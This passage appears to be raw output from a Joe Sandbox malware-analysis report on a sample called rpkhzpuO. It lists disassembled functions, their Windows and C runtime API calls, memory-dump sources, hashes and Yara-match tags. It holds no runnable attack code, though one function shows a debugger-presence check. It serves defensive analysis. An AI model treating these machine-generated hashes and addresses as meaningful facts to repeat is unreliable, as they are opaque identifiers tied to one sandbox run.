                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
                                                                                                                                              • Instruction ID: fe895d397ab1f1386039b597fae98abeab5713c03da38135d8e48cfb93c36ad6
                                                                                                                                              • Opcode Fuzzy Hash: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
                                                                                                                                              • Instruction Fuzzy Hash: C611AF76504644CFCB02CF10D5C4B06BF72FB94314F24C6AAD9494B656C33AE55ADBA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3faa95300d04d70d3bcfbc87054ffdc8c46fd49337a1c335f12a473d749740a2
                                                                                                                                              • Instruction ID: 17a1edbb2d5ea56d41d5d5f73281e9912a25ec2836d4974ac995a65aba396c33
                                                                                                                                              • Opcode Fuzzy Hash: 3faa95300d04d70d3bcfbc87054ffdc8c46fd49337a1c335f12a473d749740a2
                                                                                                                                              • Instruction Fuzzy Hash: 4701407140D7809EE7128B259884752BFB8EF43224F18859BD984CF2A7C2695C45CB72
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 31f48b0dd7acbc9b5a24bd3f193032b2a024d943ace43d01cf3c40b3c8d12948
                                                                                                                                              • Instruction ID: 744d3a5794b2ba0c4f4a5ec435b9c9e446cf8d438993034628acdda95165a9cd
                                                                                                                                              • Opcode Fuzzy Hash: 31f48b0dd7acbc9b5a24bd3f193032b2a024d943ace43d01cf3c40b3c8d12948
                                                                                                                                              • Instruction Fuzzy Hash: D401F771008B009AE3108E16C980F57BFA8EF45360F14C42BED488A2A6C279AC42CEB2
                                                                                                                                              APIs
                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2099220238.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2099220238.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2099220238.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2099220238.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3859560861-0
                                                                                                                                              • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                              • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                              • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                              • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2099220238.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2099220238.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                              • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                              • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                              • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                              • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                              APIs
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,25731908), ref: 004170C5
                                                                                                                                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                              • _malloc.LIBCMT ref: 0041718A
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                              • _malloc.LIBCMT ref: 0041724C
                                                                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                              • __freea.LIBCMT ref: 004172A4
                                                                                                                                              • __freea.LIBCMT ref: 004172AD
                                                                                                                                              • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                              • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                              • _malloc.LIBCMT ref: 00417362
                                                                                                                                              • _memset.LIBCMT ref: 00417384
                                                                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                              • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                              • __freea.LIBCMT ref: 004173CF
                                                                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3809854901-0
                                                                                                                                              • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                              • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                              APIs
                                                                                                                                              • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                              • _malloc.LIBCMT ref: 00405842
                                                                                                                                              • _malloc.LIBCMT ref: 00405906
                                                                                                                                              • _malloc.LIBCMT ref: 00405930
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _malloc$AllocateHeap
                                                                                                                                              • String ID: 1.2.3
                                                                                                                                              • API String ID: 680241177-2310465506
                                                                                                                                              • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                              • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3886058894-0
                                                                                                                                              • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                              • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                              APIs
                                                                                                                                              • EntryPoint.RPKHZPUO(80070057), ref: 004017EE
                                                                                                                                                • Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
                                                                                                                                                • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                                              • EntryPoint.RPKHZPUO(80070057), ref: 00401800
                                                                                                                                              • EntryPoint.RPKHZPUO(80070057), ref: 00401813
                                                                                                                                              • __recalloc.LIBCMT ref: 00401828
                                                                                                                                              • EntryPoint.RPKHZPUO(8007000E), ref: 00401839
                                                                                                                                              • EntryPoint.RPKHZPUO(8007000E), ref: 00401853
                                                                                                                                              • _calloc.LIBCMT ref: 00401861
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1721462702-0
                                                                                                                                              • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                              • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                                              • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                              • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                                              APIs
                                                                                                                                              • __getptd.LIBCMT ref: 00414744
                                                                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                              • __getptd.LIBCMT ref: 0041475B
                                                                                                                                              • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                              • __lock.LIBCMT ref: 00414779
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                              • String ID: @.B
                                                                                                                                              • API String ID: 3521780317-470711618
                                                                                                                                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                              • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                              • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                              APIs
                                                                                                                                              • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                              • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                              • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                              • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                              • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2805327698-0
                                                                                                                                              • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                              • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                              • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                              • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                              APIs
                                                                                                                                              • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                              • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                              • __lock.LIBCMT ref: 00414008
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                              • InterlockedIncrement.KERNEL32(257316A8), ref: 00414050
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4271482742-0
                                                                                                                                              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                              • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                              • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                                                              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                              • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                              • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                              APIs
                                                                                                                                              • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                              • __locking.LIBCMT ref: 0040C791
                                                                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2395185920-0
                                                                                                                                              • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                              • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                              • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                              • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _fseek_malloc_memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 208892515-0
                                                                                                                                              • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                              • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                              • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                              • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                              APIs
                                                                                                                                              • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                              • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                              • __locking.LIBCMT ref: 0040BB95
                                                                                                                                              • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3240763771-0
                                                                                                                                              • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                              • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                              • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                              • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                              APIs
                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                              • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                              • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
